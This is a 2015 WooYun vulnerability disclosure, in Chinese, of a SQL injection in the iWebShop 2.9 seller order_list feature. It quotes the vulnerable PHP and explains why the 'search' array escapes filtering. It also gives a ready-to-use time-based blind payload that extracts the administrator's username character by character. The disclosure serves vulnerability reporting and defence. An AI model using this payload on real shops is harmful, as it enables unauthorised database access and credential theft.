当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093443

漏洞标题:Iwebshop最新版注入又一枚

相关厂商:Jooyea

漏洞作者: 路人甲

提交时间:2015-01-28 17:04

修复时间:2015-04-28 17:06

公开时间:2015-04-28 17:06

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Iwebshop最新版注入又一枚

详细说明:

看到wooyun上有人提了几个iweshop(2014-11-18更新)的漏洞( WooYun: iWebShop开源电子商务系统SQL注入漏洞 ),去官网看了看,在2014-12-16 已更新到了 iwebshop2.9.14121000,下下来研究研究,希望不要重复。
注入一枚:POST /index.php?controller=seller&action=order_list POST参数中的search作为一个数组传入,search的KEY and VALUE 都过滤不完全,注入成功,文件在/controllers/seller.php的order_list()方法中
看看代码/controllers/seller.php

public function order_list(){
//搜索条件
$seller_id = $this->seller['seller_id'];
$search = IFilter::act(IReq::get('search'));
$page = IReq::get('page') ? IFilter::act(IReq::get('page'),'int') : 1;
//检索条件
list($join,$where) = order_class::getSellerSearchCondition($search);
$where .= " and go.seller_id=".$seller_id;
//拼接sql
$orderHandle = new IQuery('order_goods as og');
$orderHandle->order = "o.id desc";
$orderHandle->fields = "o.*";
$orderHandle->page = $page;
$orderHandle->join = $join;
$orderHandle->where = $where;

$this->search = $search;
$this->orderHandle = $orderHandle;
$this->redirect('order_list');
}


$search 是这样获得的$search = IFilter::act(IReq::get('search'));,去看看IFilter::act
/lib/core/util/filter_class.php

/**
* @brief 对字符串进行过滤处理
* @param string $str 被过滤的字符串
* @param string $type 过滤数据类型 值: int, float, string, text, bool, url
* @param int $limitLen 被输入的最大字符个数 , 默认不限制;
* @return string 被过滤后的字符串
* @note 默认执行的是string类型的过滤
*/
public static function act($str,$type = 'string',$limitLen = false)
{
if(is_array($str))
{
foreach($str as $key => $val)
{
$resultStr[$key] = self::act($val, $type, $limitLen);
}
return $resultStr;
}
else
{
switch($type)
{
case "int":
return intval($str);
break;
case "float":
return floatval($str);
break;
case "text":
return self::text($str,$limitLen);
break;
case "bool":
return (bool)$str;
break;
case "url":
return self::clearUrl($str);
break;
case "filename":
return self::fileName($str);
break;
default:
return self::string($str,$limitLen);
break;
}
}
}


因为在获取$search时,$search = IFilter::act(IReq::get('search')); act()没有指定第二个类型参数,所以,把search 当作string过滤,这里是数字型的,不用闭合单引号,造成注入。
Search最终在/view/sysseller/seller/order_list.html中被带入sql执行

{foreach:items = $this->orderHandle->find()}


测试方法:申请开店后,登录,然后发送下面的post包即可。
Payload:POST提交

search[id]=1 or(select if(ord(mid((select admin_name from admin limit 0,1),1,1))=98,sleep(1),0))#


因为是time-based blind 注入,猜测管理员用户名的第一个字母时,若错误,延迟1s左右,如下图

猜测失败副本.jpg


若正确,延迟7s左右(和数据库中的记录有关)如下图

猜测成功副本.jpg

漏洞证明:

见 详细说明

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝